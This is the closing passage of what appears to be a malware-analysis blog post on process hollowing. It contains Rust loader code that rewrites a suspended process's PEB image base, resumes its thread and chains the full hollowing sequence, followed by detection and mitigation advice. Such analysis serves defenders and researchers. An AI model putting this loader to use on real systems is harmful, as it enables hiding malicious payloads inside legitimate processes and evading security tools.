    /// Step 6: Update PEB
    pub fn update_peb(&self) -> Result<(), String> {
        let mut context: CONTEXT = unsafe { std::mem::zeroed() };
        context.ContextFlags = CONTEXT_FULL;

        unsafe {
            GetThreadContext(self.thread_handle, &mut context);
        }

        // PEB address is in RCX register (64-bit)
        let peb_address = context.Rcx as *mut u64;
        let image_base_offset = 0x10; // Offset of ImageBaseAddress in PEB
        let peb_image_base = unsafe {
            (peb_address as usize + image_base_offset) as *mut u64
        };

        let new_image_base = self.payload_base as u64;
        let mut bytes_written: usize = 0;

        unsafe {
            WriteProcessMemory(
                self.process_handle,
                peb_image_base as *mut c_void,
                &new_image_base as *const u64 as *const c_void,
                std::mem::size_of::<u64>(),
                &mut bytes_written,
            );
        }

        Ok(())
    }

    /// Step 7: Resume thread
    pub fn resume(&self) -> Result<(), String> {
        let result = unsafe { ResumeThread(self.thread_handle) };

        if result == u32::MAX {
            return Err(format!("ResumeThread failed: {}", unsafe { GetLastError() }));
        }

        Ok(())
    }

    /// Complete process hollowing operation
    pub fn execute(&mut self, payload: &[u8]) -> Result<(), String> {
        // Determine if payload is 64-bit
        self.is_64bit = Self::is_64bit_pe(payload)?;

        // Allocate memory
        self.allocate_payload(payload, None)?;

        // Write payload
        self.write_payload(payload)?;

        // Update PE headers
        let entry_point = self.update_pe_headers()?;

        // Update thread context
        self.update_thread_context(entry_point)?;

        // Update PEB
        self.update_peb()?;

        // Resume thread
        self.resume()?;

        Ok(())
    }

    // Helper functions for PE parsing and manipulation...
}

The implementation includes comprehensive error handling at each step, ensuring that failures are properly reported and resources are cleaned up. The PE parsing functions extract necessary information from the payload, including the preferred image base, image size, and architecture. Relocation handling ensures that the payload can be loaded at addresses different from its preferred base. Architecture detection allows the code to handle both 32-bit and 64-bit payloads appropriately. Resource management is handled through the Drop trait, ensuring that process and thread handles are properly closed even if an error occurs.


Detection and Mitigation

Detection Techniques

Behavioral analysis is one of the most effective ways to detect process hollowing. Security tools should monitor for processes created with the CREATE_SUSPENDED flag, as this is a strong indicator of potential process hollowing. Large memory allocations in newly created processes, especially with executable permissions, are another red flag. Thread context modifications before the first execution of a process are highly suspicious, as legitimate processes don’t typically modify their thread context before starting. PEB modifications, particularly changes to the ImageBaseAddress field, are another indicator. Finally, WriteProcessMemory calls to remote processes, especially large writes to newly created processes, should be monitored.

Static analysis can also be effective for detecting process hollowing. Analysts should look for CreateProcess calls with the CREATE_SUSPENDED flag, sequences of VirtualAllocEx followed by WriteProcessMemory, GetThreadContext and SetThreadContext calls, PEB manipulation code, and ResumeThread calls after context modification. These patterns, when found together, strongly suggest process hollowing.

Memory analysis can reveal process hollowing by checking if the process name doesn’t match the loaded module, if the PEB ImageBaseAddress doesn’t match the file on disk, if there are suspicious memory regions with executable permissions, or if code sections don’t match the original executable. These discrepancies indicate that the process has been modified from its original state.

Mitigation Strategies

Process monitoring is a critical defense mechanism. Security tools should monitor process creation events and alert on suspended process creation. Tracking memory allocations in new processes can help identify suspicious behavior early. API hooking can be used to intercept critical APIs such as CreateProcess, WriteProcessMemory, and SetThreadContext, logging and analyzing suspicious patterns, and blocking known malicious sequences.

Memory protection mechanisms can help prevent process hollowing. Data Execution Prevention (DEP) makes it harder to execute code from non-executable memory regions. Address Space Layout Randomization (ASLR) makes it more difficult to predict memory addresses, complicating the injection process. Control Flow Guard (CFG) helps prevent execution flow hijacking.

Behavioral detection using machine learning models can identify anomalous process behavior. Anomaly detection for process creation patterns can flag unusual sequences of API calls. Network traffic analysis can reveal communication patterns that indicate malicious activity.

Code integrity measures can help ensure that only legitimate code executes. Code signing verification ensures that executables are from trusted sources. Module verification checks that loaded modules match their on-disk signatures. Process integrity checks can detect when a process has been modified from its original state.


Conclusion

Through my analysis of the malware sample from Malware Bazaar using Binary Ninja, I discovered a sophisticated implementation of process hollowing. This technique demonstrates the complexity of modern malware and the importance of thorough reverse engineering. Understanding how it works is crucial for malware analysts who need to reverse engineer and understand malicious behavior, security researchers who develop detection and mitigation strategies, defenders who protect systems from these attacks, and developers who need to understand Windows internals and process management.

The key takeaways from this analysis are that process hollowing replaces legitimate process code with malicious payload, the critical steps involve creating a suspended process, allocating memory, writing the payload, updating the context, and resuming execution. PE format knowledge is essential for understanding the technique, PEB manipulation is crucial for successful execution, and detection requires monitoring process creation, memory operations, and context modifications.

For further reading, I recommend Windows Internals by Russinovich, Solomon, and Ionescu for deep understanding of Windows internals, the Microsoft PE Format Specification for detailed PE structure information, and malware analysis books such as Practical Malware Analysis and The Art of Memory Forensics for comprehensive analysis techniques.

This technique should only be used for security research, malware analysis, educational purposes, and authorized penetration testing. It should never be used for malicious purposes.


References


About This Analysis

This blog post documents my reverse engineering analysis of a malware sample obtained from Malware Bazaar for legitimate security research purposes. All HLIL code snippets were extracted directly from Binary Ninja during my analysis session. The goal of this research is to understand modern malware techniques, share knowledge with the security research community, help defenders develop better detection strategies, and educate security professionals about process hollowing.

⚠️ Important: This blog post is for educational purposes only. The malware sample was analyzed in a controlled environment for security research. The techniques described should only be used in authorized security research and malware analysis contexts.

Leave a Reply